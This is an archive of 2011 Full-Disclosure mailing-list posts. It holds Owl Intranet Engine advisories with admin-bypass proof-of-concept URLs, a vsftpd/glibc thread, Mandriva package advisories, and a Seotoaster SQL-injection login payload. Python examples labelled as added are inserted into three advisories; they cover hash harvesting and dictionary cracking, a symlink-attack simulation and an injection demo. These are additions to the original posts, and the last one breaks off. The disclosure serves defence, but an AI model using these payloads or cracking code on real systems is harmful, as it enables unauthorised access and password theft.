[Full-disclosure] [RT-SA-2011-005] Owl Intranet Engine: Authentication Bypass

2011-12-15 Thread RedTeam Pentesting GmbH
Advisory: Owl Intranet Engine: Authentication Bypass

During a penetration test, RedTeam Pentesting discovered an
Authentication Bypass vulnerability in the Owl Intranet Engine, which
allows unauthenticated users administrative access to the affected
systems.


Details
===

Product: Owl Intranet Engine
Affected Versions: 1.00, possibly all older versions
Fixed Versions: 1.01
Vulnerability Type: Authentication Bypass
Security Risk: high
Vendor URL: http://owl.anytimecomm.com
Vendor Status: fixed version released
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-005
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
===

Owl is a multi user document repository (knowledge base) system written
in PHP for publishing files/documents onto the web for a corporation,
small business, group of people, or just for yourself.

(From the vendor's homepage)


More Details
===

The Owl Intranet Engine implements an administrative interface, allowing
users in the Administrators group to add and edit users and generally
maintain the Owl system. By default, a guest account is activated that
can be used for anonymous read-only access.

Under normal circumstances, no user is allowed access to the system if
authentication or authorisation fails.  If however the guest account on
the system is deactivated (option Disable User), it is possible to
completely bypass authentication and authorisation and gain access to
the admin area.

When a page belonging to the administrative interface is requested, it
first checks whether the user is authorised to view it. For this purpose,
the function fIsAdmin(true) in lib/owl.lib.php is called. If the return
value is false, the PHP function die() is called, showing a message to
the user that he or she is not authorised to view this page.

If the return value is true and guest access is disabled, however, the
PHP function header() is used to redirect the user to the login page,
but die() is not called afterwards, so the rest of the page is still
built and sent along with the redirect. If the browser is configured not
to follow the redirect, the whole page content is shown to the attacker.

As the Owl Intranet Engine uses the PHP function extract() on the global
arrays $_POST and $_GET, it is possible to set the value of the global
variable $userid by passing it as a GET parameter. Appending the string
?userid=VALUE to the URL sets the userid to an arbitrary value.

The initial admin user always has the id 1, so this value can be used
as an administrative user's id. In the fIsAdmin() function, the access
rights of the user are checked using the query

SELECT userid,groupid from membergroup where userid = '$userid' and
groupid = '0'

The $userid variable now contains the value 1 set via the GET request,
so the query returns a matching row, fIsAdmin() returns true, and the
requested page is loaded in the attacker's browser.


Proof of Concept
===

A web browser that does not follow redirects is needed, for example
Firefox with the NoRedirect extension installed and activated.


The following URL displays the UsersGroups tab of the administrative
interface:

http://www.example.org/owl/admin/index.php?userid=1


The next URL displays the mask for adding new users to the system:

http://www.example.org/owl/admin/index.php?userid=1&newuser


This URL allows direct editing of the default administrator account:

http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1


Workaround
===

A possible workaround is to add a call to exit() after every header()
call used for redirecting, so that no page content is generated once
the redirect has been issued. In addition, the variable $userid should
be reset to a sane default value after the call to extract() on the
global $_GET and $_POST arrays, so that it cannot be supplied by the
client.


Fix
===

Upgrade to version 1.01.


Security Risk
===

This vulnerability allows unauthenticated and unauthorised users to
access the Owl Intranet Engine with administrative access rights,
allowing them to fully control the affected system.


History
===

2011-05-29 Vulnerability identified
2011-07-26 Customer approved disclosure to vendor
2011-10-31 Vendor notified
2011-11-30 Vendor released fixed version and notifies customer base
2011-12-15 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
http://www.redteam-pentesting.de.

___

[Full-disclosure] [RT-SA-2011-006] Owl Intranet Engine: Information Disclosure and Unsalted Password Hashes

2011-12-15 Thread RedTeam Pentesting GmbH
Advisory: Owl Intranet Engine: Information Disclosure and Unsalted Password 
Hashes

The Owl Intranet Engine uses no salting in the password hashing
procedure. Furthermore, users in the Administrators group are able to
see the MD5 password hashes of every user using the web interface.


Details
===

Product: Owl Intranet Engine
Affected Versions: 1.01, possibly all older versions
Fixed Versions: none
Vulnerability Type: Information Disclosure, Unsalted Password Hashes
Security Risk: low
Vendor URL: http://owl.anytimecomm.com
Vendor Status: decided not to fix
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2011-006
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
===

Owl is a multi user document repository (knowledge base) system written
in PHP for publishing files/documents onto the web for a corporation,
small business, group of people, or just for yourself.

(From the vendor's homepage)


More Details
===

The administrative interface of the Owl Intranet Engine allows users in
the Administrators group to edit user accounts via the UsersGroups tab.
If a user is selected for editing, all account information is shown. In
this overview, the password field is pre-filled with the MD5 hash of the
user's current password, as can be seen in the HTML source of the page.
This allows users with administrative access to the Owl Intranet Engine
to see the password hashes of every user.

Furthermore, no salt is used when the password hashes are generated,
which allows a rainbow table attack against the user passwords.
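The following is an added example, not code from the advisory or from
Owl. It shows both halves of the issue on constructed data: harvesting
the MD5 values out of the edit-user form source, where the password
field carries the stored hash as its value, and why unsalted MD5 lets
one precomputed table recover every user at once while a per-user salt
forces the attacker to rebuild the table for each user. The HTML
fragment, the field names, the user names and the word list are all
constructed for the demo; the real form's field names are an assumption.

```python
"""Added example; not from the RedTeam advisory or from Owl."""
import hashlib
import os
import re

# Constructed stand-in for the edit-user form; the field names are assumptions,
# the 32-hex value in the password field is what the advisory describes.
SAMPLE_FORM_HTML = """
<form action="index.php" method="post">
<input type="text" name="username" value="alice">
<input type="password" name="password" value="5f4dcc3b5aa765d61d8327deb882cf99">
</form>
<form action="index.php" method="post">
<input type="text" name="username" value="bob">
<input type="password" name="password" value="e10adc3949ba59abbe56e057f20f883e">
</form>
"""

# Constructed word list standing in for a real rainbow table or dictionary.
WORDLIST = ["owl", "letmein", "password", "123456", "qwerty"]

USER_AND_HASH = re.compile(
    r'name="username"\s+value="([^"]*)".*?name="password"\s+value="([0-9a-f]{32})"',
    re.IGNORECASE | re.DOTALL)


def extract_hashes(html):
    """Harvest (username, md5hex) pairs from the edit-user form source."""
    return USER_AND_HASH.findall(html)


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def build_table(wordlist, salt=""):
    """Precompute hash -> candidate. With salt="" the table is reusable against
    every unsalted user; a per-user salt means one table per user."""
    return {md5_hex(salt + w): w for w in wordlist}


def crack(pairs, table):
    """Map username -> recovered password (None if the hash is not in the table)."""
    return {user: table.get(h) for user, h in pairs}


def salted_store(password, salt=None):
    """Hardened storage: a per-user random salt kept next to the hash. MD5+salt
    only defeats shared precomputation; a slow KDF such as hashlib.pbkdf2_hmac
    is the real upgrade, left out here to stay on the advisory's point."""
    salt = salt or os.urandom(8).hex()
    return salt + ":" + md5_hex(salt + password)


def verify_salted(stored, password):
    salt, digest = stored.split(":", 1)
    return md5_hex(salt + password) == digest
```

With the constructed form, build_table(WORDLIST) recovers both users in
one lookup each; a salted entry from salted_store() is absent from that
table and only falls to a table rebuilt with that user's salt.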


Fix
===

None.


Security Risk
===

This vulnerability allows administrative users to collect the MD5
password hashes of every user of the affected Owl Intranet Engine system
through the administrative interface. Because no salt is employed, a
rainbow table attack can be run against the collected password hashes
and the passwords can possibly be recovered in a short time. The risk
potential is however deemed to be low, as users with administrative
access to the Owl Intranet Engine already have extensive access rights.


History
===

2011-05-29 Vulnerability identified
2011-07-26 Customer approved disclosure to vendor
2011-10-31 Vendor notified
2011-11-30 Vendor releases new version that does not fix the issue
2011-12-15 Advisory released


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
http://www.redteam-pentesting.de.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] New IETF I-D on Stable Privacy Addresses

2011-12-15 Thread Fernando Gont
Folks,

We've just published a new IETF I-D entitled A method for Generating
Stable Privacy-Enhanced Addresses with IPv6 Stateless Address
Autoconfiguration (SLAAC).

The abstract of the I-D is:
---- cut here ----
   This document specifies a method for generating IPv6 Interface
   Identifiers to be used with IPv6 Stateless Address Autoconfiguration
   (SLAAC), such that addresses configured using this method are stable
   within each subnet, but the Interface Identifier changes when hosts
   move from one network to another.  The aforementioned method is meant
   to be an alternative to generating Interface Identifiers based on
   IEEE identifiers, such that the same manageability benefits can be
   achieved without sacrificing the privacy of users.
---- cut here ----

The aforementioned I-D is available at:
http://tools.ietf.org/id/draft-gont-6man-stable-privacy-addresses-00.txt.

Any feedback will be really appreciated.

P.S.: Also, feel free to discuss the I-D on the ipv6hackers mailing-list
http://lists.si6networks.com/listinfo/ipv6hackers/

Thanks!

Best regards,
-- 
Fernando Gont
SI6 Networks
e-mail: fg...@si6networks.com
PGP Fingerprint:  31C6 D484 63B2 8FB1 E3C4 AE25 0D55 1D4E 7492





Re: [Full-disclosure] vsFTPd remote code execution

2011-12-15 Thread HI-TECH .
Hi Chris,

Am 14. Dezember 2011 08:21 schrieb Chris Evans scarybea...@gmail.com:
 On Tue, Dec 13, 2011 at 12:11 PM, HI-TECH .
 isowarez.isowarez.isowa...@googlemail.com wrote:
 Yes you are somewhat right, as this is the old discussion about if
 code execution inside an ftpd
 is a vulnerability itself or only local code execution. I have the
 opinion that an ftpd which does not allow to run code
 should restrict the user so, and if there is a way to execute code it
 it is a vulnerability.
 Take the example of a vsftpd configured for anonymous ftp and write
 access in /var/ftp.

 IIRC, vsftpd can refuse to start an anonymous session for the
 misconfiguration where the root directory is writeable (to avoid
 problems in the libc like this). I'll make sure it still works and
 maybe check other paths such as /etc


that's indeed true, nevertheless I have seen boxes in the wild
with vsftpd running with anonymous and write access in
/var/ftp, maybe because this security measure was built into
vsftpd in newer versions? I am not sure.

 For local users, there's a configuration setting: chroot_local_user.
 The compiled-in default is false, and the man page cautions:
 ---
 .BR Warning:
 This option has security implications, especially if the users have upload
 permission, or shell access. Only enable if you know what you are doing.
 ---

 I'm not uptodate with whether Linux distributions have turned this on
 by default or not.

I think it is not the default setting but many admins will make use of it in
hosting environments.

 vsftpd does have the concept of virtual users. I'm not sure if it's
 widely used but it seems that this type of user login would present
 the biggest headache.


 Amusingly, vsftpd already attempts to desist glibc from loading any
 timezone files from inside the chroot() (see env_init) by warming up
 the subsystem and even explicitly setting TZ in the environment. glibc
 displeases me. Perhaps it's a gmtime() vs. localtime() issue -- I'm
 curious to know if glibc still crashes if the setting
 use_localtime=YES is used?

I haven't checked that but as you said in a private conversation
caching the zoneinfo file through glibc beforehand makes the zoneinfo file
usage disappear in my strace output.

 I don't mind adding workarounds or avoidances for libc bugs (for
 example, functions like regcomp, fnmatch have long been avoided). If
 you had any clever ideas, I'm happy to put them in, otherwise it's a
 case of waiting for the glibc updates.


For me it is a miracle why this bug was not patched in glibc back in 2009.

Here is the patch by you Chris I hope I can go ahead and post it here
on full disclosure
as this might get into a new release anyways (use at your own risk!):

Add this to the very bottom of vsf_sysutil_tzset():

---snip---
  /* call localtime() and gmtime() once more so that glibc has loaded
     and cached its zoneinfo data before the chroot() */
  p_tm = localtime(&the_time);
  if (p_tm == NULL)
  {
    die("localtime #2");
  }
  p_tm = gmtime(&the_time);
  if (p_tm == NULL)
  {
    die("gmtime");
  }
---snip---

Regards,

Kingcope

 Cheers
 Chris

 The attacker might
 execute code using the vulnerability without authentication
 credentials, or for example an attacker only has
 access to a user account configured for ftp.
 Basically you are right, vsftpd uses privsep so its a not so risky
 vulnerability.

 /Kingcope

 Am 13. Dezember 2011 20:56 schrieb Dan Rosenberg dan.j.rosenb...@gmail.com:
 Anyone with an up2date linux local root which only makes use of syscalls? 
 :


 This is all fun stuff, and definitely worth looking into further, but
 if you've got a local kernel exploit that you can trigger from inside
 vsftpd, you don't need this (potential) vulnerability in vsftpd - you
 already win.

 -Dan



[Full-disclosure] More on exploiting glibc __tzfile_read integer overflow to buffer overflow and vsftpd

2011-12-15 Thread Ramon de C Valle
More on exploiting glibc __tzfile_read integer overflow to buffer overflow and 
vsftpd
http://rcvalle.com/post/14261796328/more-on-exploiting-glibc-tzfile-read-integer-overflow

-- 
Ramon de C Valle / Red Hat Security Response Team



[Full-disclosure] [Announcement] ClubHack Mag Issue 23- December 2011 Released

2011-12-15 Thread Abhijeet Patil
Dear All,
Here is Issue-23, December 2011, of ClubHack Magazine. The poster
of the magazine was released at the recently held ClubHack 2011 hacking
conference.

This issue covers following articles:-

0x00 Tech Gyan - GSM
0x01 Tool Gyan - Echo Mirage
0x02 Mom's Guide - OWASP Mobile Security Project
0x03 Legal Gyan - Reasonable Security Practices under Information
Technology (Amendment) Act, 2008
0x04 Matriux Vibhag - Forensics – Part III
0x05 Poster - Mobile Warfare

Check http://chmag.in/ for articles.
The PDF version can be downloaded from: http://chmag.in/issue/dec2011.pdf

Coming to ClubHack 2011 Conference, the presentations are available at:
http://www.slideshare.net/clubhack

and videos at:
http://clubhack.tv/event/2011

Send us your feedback at i...@chmag.in

Regards,
Abhijeet Patil,
ClubHack
http://chmag.in
http://clubhack.com

[Full-disclosure] [ MDVSA-2011:187 ] php-pear

2011-12-15 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:187
 http://www.mandriva.com/security/
 ___

 Package : php-pear
 Date: December 15, 2011
 Affected: 2010.1, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been discovered and corrected in php-pear:
 
 The installer in PEAR before 1.9.2 allows local users to overwrite
 arbitrary files via a symlink attack on the package.xml file,
 related to the (1) download_dir, (2) cache_dir, (3) tmp_dir, and
 (4) pear-build-download directories, a different vulnerability than
 CVE-2007-2519 (CVE-2011-1072).
 
 This advisory provides PEAR 1.9.4 which is not vulnerable to this
 issue.
 
 Additionally, for Mandriva Enterprise Server 5 many new or updated
 PEAR packages are being provided with the latest versions of the
 respective packages, which also mitigates various dependency issues.
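As an added example that is not part of this advisory, of PEAR or of
Mandriva's packages, the Python script below shows the bug class
CVE-2011-1072 belongs to, on constructed paths inside temporary
directories: an installer that writes package.xml into a shared
download/cache/tmp directory with a plain open() follows a symlink that
another local user planted there, so the write lands on whatever file
the link points to. The hardened writer creates the file with
O_CREAT|O_EXCL (plus O_NOFOLLOW where the platform has it), which refuses
to go through an existing path or link. The file names are assumptions;
the script needs a POSIX system with symlink support.

```python
"""Added example; not Mandriva's, PEAR's or the advisory's code."""
import os
import tempfile


def naive_write(path, data):
    """What the vulnerable installer effectively does: open for writing and
    follow whatever `path` is, symlink included."""
    with open(path, "w") as f:
        f.write(data)


def exclusive_create(path, data):
    """Hardened: succeed only by creating a brand-new regular file ourselves.
    O_EXCL makes open() fail with EEXIST if `path` exists at all, even as a
    dangling symlink; O_NOFOLLOW is belt-and-braces where it is available."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def simulate_symlink_attack():
    """Returns (victim file contents after the naive write, whether the
    exclusive create refused the planted link). Both directories and file
    names are constructed for the demo."""
    with tempfile.TemporaryDirectory() as shared, tempfile.TemporaryDirectory() as home:
        victim = os.path.join(home, "important.conf")      # file the attacker wants clobbered
        with open(victim, "w") as f:
            f.write("original\n")
        planted = os.path.join(shared, "package.xml")     # attacker's symlink in the shared dir
        os.symlink(victim, planted)

        naive_write(planted, "attacker controlled\n")     # follows the link onto victim
        with open(victim) as f:
            after_naive = f.read()

        try:
            exclusive_create(planted, "attacker controlled\n")
            refused = False
        except OSError:                                   # EEXIST (or ELOOP): write refused
            refused = True
        return after_naive, refused


if __name__ == "__main__":
    contents, refused = simulate_symlink_attack()
    print("victim now contains:", repr(contents))
    print("exclusive create refused the link:", refused)
```

The naive path rewrites the victim file; the exclusive path raises
instead of writing. Using a private, non-world-writable directory for
downloads and temporary files removes the attacker's ability to plant the
link in the first place, and is the other half of the fix.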
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1072
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 d9056b432515298ea3459a1d0dd314c2  
2010.1/i586/php-pear-1.9.4-0.1mdv2010.2.noarch.rpm 
 eaf5ade94e635cb3e8bf6b814b4d60f3  
2010.1/SRPMS/php-pear-1.9.4-0.1mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 65e5a84bedbed40be7093e3bbdea2ef5  
2010.1/x86_64/php-pear-1.9.4-0.1mdv2010.2.noarch.rpm 
 eaf5ade94e635cb3e8bf6b814b4d60f3  
2010.1/SRPMS/php-pear-1.9.4-0.1mdv2010.2.src.rpm

 Mandriva Enterprise Server 5:
 5779054bb6507fed3dc57d6d5acd59b0  
mes5/i586/php-pear-1.9.4-0.1mdvmes5.2.noarch.rpm
 cb900fcca60528cea132ebc13c80906d  
mes5/i586/php-pear-Auth-1.6.4-0.1mdvmes5.2.noarch.rpm
 cc6f65ee506b1447c0b731e5daf3737a  
mes5/i586/php-pear-Auth_RADIUS-1.0.7-0.1mdvmes5.2.noarch.rpm
 898a706dea6c53839bd9f511b133ad6f  
mes5/i586/php-pear-Auth_SASL-1.0.6-0.1mdvmes5.2.noarch.rpm
 cbcf597d64cbde0620f356428cf85b9c  
mes5/i586/php-pear-Cache_Lite-1.7.12-0.1mdvmes5.2.noarch.rpm
 a927787fd35ae5aabd5d16c809fa4052  
mes5/i586/php-pear-Console_ProgressBar-0.5.2beta-0.1mdvmes5.2.noarch.rpm
 b3095e751b4d3ae849a0d489459babcb  
mes5/i586/php-pear-Crypt_CHAP-1.5.0-0.1mdvmes5.2.noarch.rpm
 424e58e6c5827b07ba211718dc51776d  
mes5/i586/php-pear-Date-1.5.0a2-0.1mdvmes5.2.noarch.rpm
 988dd5ed73222d3707d39ca2a868a887  
mes5/i586/php-pear-Date_Holidays-0.21.5-0.1mdvmes5.2.noarch.rpm
 b5fc2aae1f7b787ea88f818a11fe9e92  
mes5/i586/php-pear-Date_Holidays_Austria-0.1.3-0.1mdvmes5.2.noarch.rpm
 3a93ad9120c162c71cdbd3de63e04781  
mes5/i586/php-pear-Date_Holidays_Brazil-0.1.2-0.1mdvmes5.2.noarch.rpm
 cea9ba4009c04872246b9365b117e7df  
mes5/i586/php-pear-Date_Holidays_Denmark-0.1.3-0.1mdvmes5.2.noarch.rpm
 fc000c989817f67990fe7f8b9a3b8815  
mes5/i586/php-pear-Date_Holidays_Discordian-0.1.1-0.1mdvmes5.2.noarch.rpm
 612e97c5374d79748cd5c8bc17bf7546  
mes5/i586/php-pear-Date_Holidays_EnglandWales-0.1.2-0.1mdvmes5.2.noarch.rpm
 736b242a65a0ac5415c930e18de3c27d  
mes5/i586/php-pear-Date_Holidays_Germany-0.1.2-0.1mdvmes5.2.noarch.rpm
 b0df3150a85f1e201a361e89243587bd  
mes5/i586/php-pear-Date_Holidays_Iceland-0.1.2-0.1mdvmes5.2.noarch.rpm
 7d61dc88b7fea3467c1f90a30ba88798  
mes5/i586/php-pear-Date_Holidays_Italy-0.1.1-0.1mdvmes5.2.noarch.rpm
 974c95144927d854778ea5c4b0dc9868  
mes5/i586/php-pear-Date_Holidays_Japan-0.1.1-0.1mdvmes5.2.noarch.rpm
 40d4af52e3b3cd54477f6c055b0619c4  
mes5/i586/php-pear-Date_Holidays_Netherlands-0.1.2-0.1mdvmes5.2.noarch.rpm
 6006d2ac25e104c65c9718694a5a9157  
mes5/i586/php-pear-Date_Holidays_Norway-0.1.2-0.1mdvmes5.2.noarch.rpm
 1b934b61f2bdbaa44e3f0b320269805b  
mes5/i586/php-pear-Date_Holidays_PHPdotNet-0.1.2-0.1mdvmes5.2.noarch.rpm
 4ab10f9985837f7e39100d54bca82717  
mes5/i586/php-pear-Date_Holidays_Romania-0.1.2-0.1mdvmes5.2.noarch.rpm
 ed816908d5d1a9b3e12db7cce2966df6  
mes5/i586/php-pear-Date_Holidays_Slovenia-0.1.2-0.1mdvmes5.2.noarch.rpm
 b0c23ec3be7b34cd7f042f9787c7d4ea  
mes5/i586/php-pear-Date_Holidays_Sweden-0.1.2-0.1mdvmes5.2.noarch.rpm
 4bc6b95b9bf650337be0fdfed8916c04  
mes5/i586/php-pear-Date_Holidays_Ukraine-0.1.2-0.1mdvmes5.2.noarch.rpm
 c4d0938a8d78ec9c6810d06edb79737e  
mes5/i586/php-pear-Date_Holidays_UNO-0.1.3-0.1mdvmes5.2.noarch.rpm
 1f854daf44aea34ffd93585615905a37  
mes5/i586/php-pear-Date_Holidays_USA-0.1.1-0.1mdvmes5.2.noarch.rpm
 471bf07eb2e5e80783273ca4f2a26b45  
mes5/i586/php-pear-DB-1.7.14-0.1mdvmes5.2.noarch.rpm
 73d16fb47e151b0d6b085d25b78c9def  
mes5/i586/php-pear-DB_DataObject-1.9.6-0.1mdvmes5.2.noarch.rpm
 9bdca0d49f65f340b7f376d59a0840f3  
mes5/i586/php-pear-File_Passwd-1.1.7-0.1mdvmes5.2.noarch.rpm
 871f3f7eecc12bc589a490df0191f874  
mes5/i586/php-pear-File_SMBPasswd-1.0.3-0.1mdvmes5.2.noarch.rpm
 

Re: [Full-disclosure] vsFTPd remote code execution

2011-12-15 Thread xD 0x41
There are guides, like;

http://blog.up-link.ro/how-to-set-up-vsftpd-virtual-users-berkeley-db-pam/

which is following this trend... to create a var/ftp/public or
var/ftp/user, which is great... if you're not running vsftpd...





[Full-disclosure] [ MDVSA-2011:188 ] libxml2

2011-12-15 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:188
 http://www.mandriva.com/security/
 ___

 Package : libxml2
 Date: December 15, 2011
 Affected: 2010.1, 2011, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities have been discovered and corrected in libxml2:
 
 Off-by-one error in libxml allows remote attackers to execute arbitrary
 code or cause a denial of service (heap-based buffer overflow and
 application crash) via a crafted web site (CVE-2011-0216).
 
 libxml2 allows remote attackers to cause a denial of service
 (out-of-bounds read) via unspecified vectors (CVE-2011-3905).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0216
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3905
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 23ef99787f1b7ef3e64bc0762f3f3a4e  
2010.1/i586/libxml2_2-2.7.7-1.5mdv2010.2.i586.rpm
 feb02c6f36c8583a5bc2854f0433fe86  
2010.1/i586/libxml2-devel-2.7.7-1.5mdv2010.2.i586.rpm
 b706e84011c20d382a18a086894dca2b  
2010.1/i586/libxml2-python-2.7.7-1.5mdv2010.2.i586.rpm
 b963f6ab4f39336a51a0471de5c0a9da  
2010.1/i586/libxml2-utils-2.7.7-1.5mdv2010.2.i586.rpm 
 dc474dd86bf91fbb13fcd8968a27194f  
2010.1/SRPMS/libxml2-2.7.7-1.5mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 a61db16fd54c0fda75a5c0268d3524bd  
2010.1/x86_64/lib64xml2_2-2.7.7-1.5mdv2010.2.x86_64.rpm
 4f2fd97b4bbab696fae212559295516f  
2010.1/x86_64/lib64xml2-devel-2.7.7-1.5mdv2010.2.x86_64.rpm
 8064e2b0a5d5525c533be6cd61f20293  
2010.1/x86_64/libxml2-python-2.7.7-1.5mdv2010.2.x86_64.rpm
 d1aab22793a453e2fbaa6bc2c05b0de0  
2010.1/x86_64/libxml2-utils-2.7.7-1.5mdv2010.2.x86_64.rpm 
 dc474dd86bf91fbb13fcd8968a27194f  
2010.1/SRPMS/libxml2-2.7.7-1.5mdv2010.2.src.rpm

 Mandriva Linux 2011:
 8d0ea419886a45a7d2106d1f697fb0af  
2011/i586/libxml2_2-2.7.8-6.3-mdv2011.0.i586.rpm
 bbd914f659c2ea83a438eddcd3c31292  
2011/i586/libxml2-devel-2.7.8-6.3-mdv2011.0.i586.rpm
 9cc5144f6394ef736686b81087aea4a3  
2011/i586/libxml2-python-2.7.8-6.3-mdv2011.0.i586.rpm
 221cd5a0cef6bd5a651469811977dd1a  
2011/i586/libxml2-utils-2.7.8-6.3-mdv2011.0.i586.rpm 
 f2683b77635f1ee49afff8cb8ad2e470  2011/SRPMS/libxml2-2.7.8-6.3.src.rpm

 Mandriva Linux 2011/X86_64:
 7a2de229452cbb4478f81a2a0c8f95f7  
2011/x86_64/lib64xml2_2-2.7.8-6.3-mdv2011.0.x86_64.rpm
 f7de6d69fe1b4da9cddafce53db848e5  
2011/x86_64/lib64xml2-devel-2.7.8-6.3-mdv2011.0.x86_64.rpm
 d90a089bcbcff95fd5db9b5a41eb0344  
2011/x86_64/libxml2-python-2.7.8-6.3-mdv2011.0.x86_64.rpm
 65b6d64de1c97b977d9b0264e9520623  
2011/x86_64/libxml2-utils-2.7.8-6.3-mdv2011.0.x86_64.rpm 
 f2683b77635f1ee49afff8cb8ad2e470  2011/SRPMS/libxml2-2.7.8-6.3.src.rpm

 Mandriva Enterprise Server 5:
 d0c8c07632d01258639be4b038ab75d4  
mes5/i586/libxml2_2-2.7.1-1.9mdvmes5.2.i586.rpm
 d8e7605a3fb748bc7c5c0f577ffbe7b4  
mes5/i586/libxml2-devel-2.7.1-1.9mdvmes5.2.i586.rpm
 677c93e393fe0004d1a2e543e498555d  
mes5/i586/libxml2-python-2.7.1-1.9mdvmes5.2.i586.rpm
 d9b1ba626d9514b26a3bf86719dfc62f  
mes5/i586/libxml2-utils-2.7.1-1.9mdvmes5.2.i586.rpm 
 c307b638da506db8346e1f790f39d772  mes5/SRPMS/libxml2-2.7.1-1.9mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 d8062c5526c39d22f819f2f70d104d2d  
mes5/x86_64/lib64xml2_2-2.7.1-1.9mdvmes5.2.x86_64.rpm
 12eabde65491a7f6883247a27b239a97  
mes5/x86_64/lib64xml2-devel-2.7.1-1.9mdvmes5.2.x86_64.rpm
 728ad366c8f67640a50b6bb6f7260684  
mes5/x86_64/libxml2-python-2.7.1-1.9mdvmes5.2.x86_64.rpm
 f91719adff8bc425c66930f5d0aa81a3  
mes5/x86_64/libxml2-utils-2.7.1-1.9mdvmes5.2.x86_64.rpm 
 c307b638da506db8346e1f790f39d772  mes5/SRPMS/libxml2-2.7.1-1.9mdvmes5.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)


[Full-disclosure] Seotoaster SQL-Injection Admin Login Bypass

2011-12-15 Thread Schurtz, Stefan
Advisory:   Seotoaster SQL-Injection Admin Login Bypass
Advisory ID:INFOSERVE-ADV2011-06
Author: Stefan Schurtz
Contact:secur...@infoserve.de
Affected Software:  Successfully tested on Seotoaster v.1.9
Vendor URL: http://www.seotoaster.com/
Vendor Status:  fixed

===
Vulnerability Description
===

Seotoaster v.1.9 is prone to an SQL injection which bypasses the admin login

===
PoC-Exploit
===

http://target/seotoaster/go

User: ' or 1=1)#
PW: notimportant
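The following is an added example and is not Seotoaster's code. It shows
why the published payload works against a login query assembled by string
concatenation, and the parameterised form that the fix amounts to. The
table and column names and the query shape (a parenthesised WHERE clause
comparing an MD5 of the password) are assumptions chosen so that the
payload ' or 1=1)# lines up with the closing parenthesis; the row data is
constructed. Since # introduces a line comment in MySQL only, the helper
strip_mysql_hash_comment truncates the concatenated query exactly where
MySQL's lexer would, so the demo runs offline on SQLite.

```python
"""Added example; not Seotoaster's code."""
import hashlib
import sqlite3

PAYLOAD_USER = "' or 1=1)#"   # the user name from the PoC above


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def setup_db():
    """Constructed admin table with one account (login admin, password s3cret)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, login TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', ?)", (md5_hex("s3cret"),))
    return conn


def build_login_query(user, pw):
    """Vulnerable: user-controlled text is spliced straight into the SQL."""
    return ("SELECT id, login FROM admin WHERE (login = '%s' AND password = '%s')"
            % (user, md5_hex(pw)))


def strip_mysql_hash_comment(sql):
    """Demo helper, not a sanitiser: drop everything from the first '#' that
    sits outside single quotes, which is how MySQL treats the payload's '#'."""
    in_quote = False
    for i, ch in enumerate(sql):
        if ch == "'":
            in_quote = not in_quote
        elif ch == "#" and not in_quote:
            return sql[:i]
    return sql


def login_vulnerable(conn, user, pw):
    """Returns the matched (id, login) row or None; the payload matches without
    knowing any password because the password clause is commented away."""
    sql = strip_mysql_hash_comment(build_login_query(user, pw))
    return conn.execute(sql).fetchone()


def login_safe(conn, user, pw):
    """Hardened: placeholders keep the payload inside the string literal."""
    return conn.execute(
        "SELECT id, login FROM admin WHERE (login = ? AND password = ?)",
        (user, md5_hex(pw))).fetchone()


if __name__ == "__main__":
    db = setup_db()
    print(build_login_query(PAYLOAD_USER, "notimportant"))
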